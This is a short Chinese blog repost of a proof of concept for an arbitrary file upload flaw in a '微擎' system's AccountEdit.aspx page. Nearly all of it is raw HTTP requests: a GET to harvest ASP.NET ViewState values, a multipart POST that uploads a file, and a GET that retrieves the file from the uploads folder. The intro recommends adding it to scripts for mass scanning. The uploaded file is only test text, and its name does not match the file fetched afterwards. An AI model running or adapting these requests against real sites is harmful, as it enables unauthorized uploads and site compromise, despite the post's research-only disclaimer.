毫无营养poc的分享这种建议加入脚本遇到批量打就可能都存在。
GET /User/AccountEdit.aspx HTTP/1.1Host: 滑板人之家User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31Content-Length: 0#使用获取到的相应值上传文件POST /User/AccountEdit.aspx HTTP/1.1Host: 滑板人之家User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/82.0.4103.116 Safari/531.36Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687-----------------------------786435874t38587593865736587346567358735687Content-Disposition: form-data; name="__VIEWSTATE"自己获取的值-----------------------------786435874t38587593865736587346567358735687Content-Disposition: form-data; name="__EVENTVALIDATION"自己获取的值-----------------------------786435874t38587593865736587346567358735687Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="ceshi.txt"Content-Type: text/plainfuck!!!!!!!-----------------------------786435874t38587593865736587346567358735687Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"上传图片-----------------------------786435874t38587593865736587346567358735687Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"-----------------------------786435874t38587593865736587346567358735687Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"-----------------------------786435874t38587593865736587346567358735687--GET /_data/Uploads/fuck.txt HTTP/1.1Host: 滑板人之家User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/81.0.4103.116 Safari/531.36Content-Length: 0
原文始发于微信公众号(滑板人之家):微擎系统-任意文件上传-AccountEdit
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论